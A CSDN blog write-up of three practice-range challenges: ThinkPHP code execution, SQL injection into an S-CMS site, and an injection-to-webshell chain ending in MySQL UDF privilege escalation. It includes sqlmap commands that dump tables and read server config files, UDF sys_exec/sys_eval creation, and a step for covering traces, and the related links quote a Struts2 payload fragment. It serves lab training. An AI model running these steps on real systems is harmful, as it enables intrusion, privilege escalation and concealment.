【安鸾靶场】实战渗透

已于 2023-10-06 18:15:02 修改
阅读量615 收藏 2
点赞数 4
分类专栏: 靶场 文章标签: 靶机 安鸾 web渗透
于 2023-10-06 17:26:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39583774/article/details/133582318
版权

文章目录

前言

最近看到安鸾的靶场有些比较有意思就打了一下午,有一定难度。

一、××租房网 (150分)

http://106.15.50.112:8031/
在这里插入图片描述
刚打开burp就报了thinkphp的代码执行
在这里插入图片描述

直接getshell
在这里插入图片描述
flag:
在这里插入图片描述

二、企业网站 (300分)

http://106.15.50.112:8035/
打开就看到闪灵cms
在这里插入图片描述
开启sqlmapapi:在这里插入图片描述
去用户界面测试:
在这里插入图片描述
这里注册一个验证码直接空就行:
这里有个注入点:

GET /?type=form&S_id=987181647 HTTP/1.1
Host: 106.15.50.112:8035
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.97 Safari/537.36
Connection: close
Cache-Control: max-age=0

在这里插入图片描述
没跑出来:
在这里插入图片描述
寻找其他注入点:
在这里插入图片描述
那个api跑的慢直接上-r
在这里插入图片描述

在这里插入图片描述
这里有个flag
在这里插入图片描述
sqlmap -r .\test.txt -D scms -T SL_flag -C “flag,id” -dump
在这里插入图片描述

三、SQL注入进阶 (550分)

题目URL:http://106.15.50.112:8023/
提示:flag在服务器根目录

感觉像是sql注入后台上传
在这里插入图片描述
感觉像是伪静态:
在这里插入图片描述
在这里插入图片描述
尝试注入:加*
在这里插入图片描述

在这里插入图片描述
加-dbs参数爆库:
在这里插入图片描述
加–tables爆表:

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述
找一下后台:
在这里插入图片描述
在这里插入图片描述
这里有upload和images:都可以直接访问
在这里插入图片描述
寻找上传点:
在这里插入图片描述

制作图片马上传:
在这里插入图片描述
尝试修改扩展名:(失败)
在这里插入图片描述
限制了后缀
寻找其他点:
在这里插入图片描述
这里又来sql注入加上刚找的就3个注入点了
使用sqlmap获取一下shell
在这里插入图片描述
直接暴力跑路径:
在这里插入图片描述
失败(应该是不是默认的路径)
读取一下apache的配置找找路径:可能存在的路径
/etc/httpd/httpd.conf - 这是一种常见的位置,特别是在使用Red Hat或CentOS等发行版的系统中。
/etc/apache2/httpd.conf - 在使用Debian或Ubuntu等系统时,配置文件可能会位于此位置。
/usr/local/apache2/conf/httpd.conf - 如果安装apache通常会在/usr/local目录下找到它。
/etc/httpd/conf/httpd.conf - 在某些系统中也可以在此位置找到配置文件。

这里是这个路径直接读取:

sqlmap -r .\test.txt  --file-read="/etc/httpd/conf/httpd.conf"

在这里插入图片描述
在这里插入图片描述
直接–os-shell(目录权限不够)
在这里插入图片描述
用upload试试:(权限不够)在这里插入图片描述
试试其他的目录:

在这里插入图片描述
最后images有权限:
在这里插入图片描述

cat看不到,可能是权限问题:
在这里插入图片描述
在这里插入图片描述
可以通过sqlmap上传自己的shell:
sqlmap 会上传自己的马:
在这里插入图片描述

在这里插入图片描述
选择我们的马上传:
在这里插入图片描述
蚁剑上线:
在这里插入图片描述
这里查看flag发现权限不够:
在这里插入图片描述
这是mysql权限:
尝试suid失败,查看内核版本为5.15.0比较高gcc也没有,mysql的用户可以使用udf提权使用mysql的权限:
这里的密码为空:
在这里插入图片描述

查看可导出文件位置

show variables like '%secure%';
这个mysql>5.1版本

这的secure_file_priv为空可以提权
在这里插入图片描述

show variables like 'plugin%'

在这里插入图片描述
在kali中生成so文件上传到plugin目录
在这里插入图片描述

在这里插入图片描述

添加sys_exec和sys_eval函数

create function sys_exec returns string soname 'mysqludf3.so'
create function sys_eval returns string soname 'mysqludf3.so'

在这里插入图片描述

在这里插入图片描述

清除痕迹:
drop function sys_eval;
drop function sys_exec;
在这里插入图片描述
在这里插入图片描述
删除shell:
在这里插入图片描述
可以自己试试。

0x717866
关注
  • 4
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
网络安全实战靶场渗透技术
zxcvbnmasdflzl的博客
12-26 440
靶机主要是从信息收集开始,发现是 flask 搭建的,然后使用 flask unsign 进行解密,暴力破解。接着使用枚举出的用户进行 FTP 登录,FTP 登录之后,下载 pdf 文件,发现管理员账号和密码规则,然后登录 FTP 管理员,接着下载压缩包,进行文件分析,发现可以使用 CVE-2021-23639 历史漏洞可以获取权限,在文件中发现存在 mysql 服务,接着进行权限提升,获取到了 root 文件。
【网络安全】2022年第一次靶场渗透实战学习
HBohan的博客
01-17 4183
渗透测试是通过模拟黑客或者骇客攻击,以评估计算机系统或者网络环境安全性的技术;主要的目的是进行安全性的评估,而不是摧毁或者破坏目标系统。
安鸾学院靶场——安全基础
最新发布
qq_55202378的博客
06-13 1306
后门端口,直接执行系统命令。注意:10021端口上ftp的后门端口为16200。添加完后,根据icon,可以看出这是一个python打包成的exe程序。看wp是由web.zip文件的,但是这里没有,所以搞不定了。下载提供的flag.zip和wordlist.txt,使用。:在vsftpd 2.3.4版本中,在登录输入用户名时输入。的返回包,可以拿到包含flag的txt文件。九阴真经上卷找不到,似乎被删了,只有下卷。类似于笑脸的符号,会导致服务处理开启。flag在whalwl数据库中。
安鸾靶场】cmseasy&内网渗透 (500分)
信安是不可或缺的一部分!
10-10 1132
等后面靶场重置,总体思路是这样的但是有点小问题,这个redis拿shell其实挺麻烦的,之前打靶场时也遇到过写入任务计划但没成功,我重置多次后成功了,这个运行不太好,也可能是frp的配置有问题。找了半天在:http://106.15.50.112:8021/config/tag/category_27.php。这里不能使用反弹shell方式,因为有可能192.168.112.3只有内网无外网环境:这里只能使用写入私钥方式。frp工具地址:https://github.com/fatedier/frp。
安鸾靶场SQL注入进阶
2301_76683178的博客
08-11 202
利用sql注入尝试写一个木马进去,结果发现不行,看报错信息,有些东西被过滤了。打开一个图片的链接,查看这个文件夹,发现是可以上传文件的文件夹。创建失败了,可能我之前已经创建过了这个函数了吧,不太了解。尝试提权,先把可以上传函数库文件夹位置的地方找出来。看看有没有可以上传文件的文件夹,尝试写一个木马上去。拿到题目,看到这个页面,其实是一个伪静态。菜刀连上去后发现flag,但是看不了。虚拟终端看了一下,是apache用户。把要写的木马编码成16进制绕过,成功。不管了,直接打开flag。函数也是可以正常用的。
安鸾渗透实战平台--综合渗透--企业网站渗透流程
jjpsb的博客
03-30 6392
本次实验的环境由安鸾渗透实战平台搭建 目标是渗透进网站拿到flag,但flag并未提示具体位置。 出于学习和记录目的,由于本人也是小白,错误的地方望指点 准备工作: 实验环境:安鸾学院-powered by S-CMS 渗透工具使用: Burpsuite Sqlmap 蚁剑(中国菜刀) Whatweb Dirsearch 实验目的: 获得webshell 寻找flag 渗透流程: 信息收集、寻找渗透点 初步使用浏览器正常浏览了一...
靶场测试--安鸾渗透实战平台
ID_xiaomage的博客
09-13 2109
CMS系列-Discuz 题目URL:http://whalwl.host:8042/forum.php(tips:flag在网站根目录下) 文章目录CMS系列-Discuz前言一、利用Burp进行抓取数据包二、将数据包发送到Repeater1.构造请求参数验证漏洞是否存在2.利用Cookie信息上传Shell3.可以使用AntSword、Chopper或者Behinder进行连接,这里使用的是AntSword总结 前言 漏洞描述 Discuz ML! V3.X存在代码注入漏洞,攻击者通过精心构建的请求
linux mysql udf 提权
ddr12231的博客
05-09 686
连接远程数据库 查看插件库路径 show variables like '%plugin%'; 写入udf库到插件目录: select unhex('7F454C4602010100000000000000000003003E0001000000800A000000000000400000000000000058180000000000000000000...
渗透学习 webug4.0靶场
07-12
渗透学习 webug4.0靶场 渗透学习 webug4.0靶场 渗透学习 webug4.0靶场
vuInhub靶场实战系列-prime:2
06-08
vuInhub靶场实战系列-prime:2
vuInhub靶场实战系列-DC-6实战
05-29
vuInhub靶场实战系列-DC-6实战
web渗透教程1:pikachu靶场搭建
11-17
带你手把手搭建pikachu靶场环境
vuInhub靶场实战系列-DC-8实战
05-31
vuInhub靶场实战系列-DC-8实战
特别的sql注入方式-DNSlog注入--安鸾靶场练习 DNSlog注入学习
AAAAAAAAAAAA66的博客
01-05 2216
DNSlog注入 原理 通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录此时变为显错注入,将盲注变显错注入,读取远程共享文件,通过拼接出函数做查询,拼接到域名中,访问时将访问服务器,记录后查看日志。 利用的场景 存在sql注入 无法获得回显 对目标网站可以发起请求 简单的来说就是可以利用 load_file() 函数,在存在注入的情况下将数据库中的信息带出我们的域名日志中(dnslog).详细的可以看下方链接 DNSLog在MySQL注入
安鸾渗透实战平台】安全基础/( 全 | 通关 )
qq_34485854的博客
11-21 2378
靶场WP | 安鸾渗透实战平台 / 安全基础 | 通关
真实渗透改编--综合渗透 sql注入写马+文件上传+udf提权 安鸾靶场SQL注入学习
AAAAAAAAAAAA66的博客
02-16 4815
从去年12月末到现在2月中,也算是把这个靶场的大多数题目刷了一遍,自己也能算的上一个初学者把,本文具体的教程在b站上有(建立靶场的师傅),而本文记录自己的解题和思考过程。如果之前没有接触到这些知识点的同学,可能会感觉到比较吃力,这是正常的。 哈兹本得的个人空间_哔哩哔哩_Bilibili 题目URL http://106.15.50.112:8023/ 目录 解题过程 sql注入写马 ​ 提权 准备udf文件(提权文件) 实施 解题过程 sql注入写马 寻找注入点 寻找网站真实.
【web攻防】安鸾靶场开发框架Struct2远程命令执行 Struct2-S2-005/S2-053远程代码执行漏洞 靶场实战+学习记录
AAAAAAAAAAAA66的博客
02-15 3931
struct2 远程命令执行01 随便输入一个 k8工具连接 上传冰蝎自带马 冰蝎连接 Struct2远程命令执行02 漏洞地址 http://106.15.50.112:8027/hello.action 漏洞POC %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymp...
安鸾靶场 宽字符注入02 靶场练习 详细过程及解决问题笔记
AAAAAAAAAAAA66的博客
02-06 3350
题目 网站URL ECSHOP演示站 - Powered by ECShop 目录 笔记 过程 进入sql注入页面 问题 判断闭合符 sql注入下的模糊查询 right 语法爆字段值 笔记 对现在我来说难度其实不大,但题目考察的一些细节要求比较高。 首先把我遇到的问题 一 一 列出。(在下面解题的过程会一 一 解决) 题目虽然是叫宽字符注入,但实际考察的是报错注入 (挂羊头卖狗肉) 这个网站很大,注入点很难找(我也是看一位师傅的write up) 自己没有...
DVWA靶场实战:SQL注入漏洞解析
在DVWA靶场中,通过这些实战练习,你可以熟悉SQL注入的检测方法,了解如何构造有效的注入语句,并学会如何防御此类攻击。这不仅有助于提高安全意识,也为成为一名合格的网络安全专家打下坚实的基础。在实际工作中,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0x717866

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值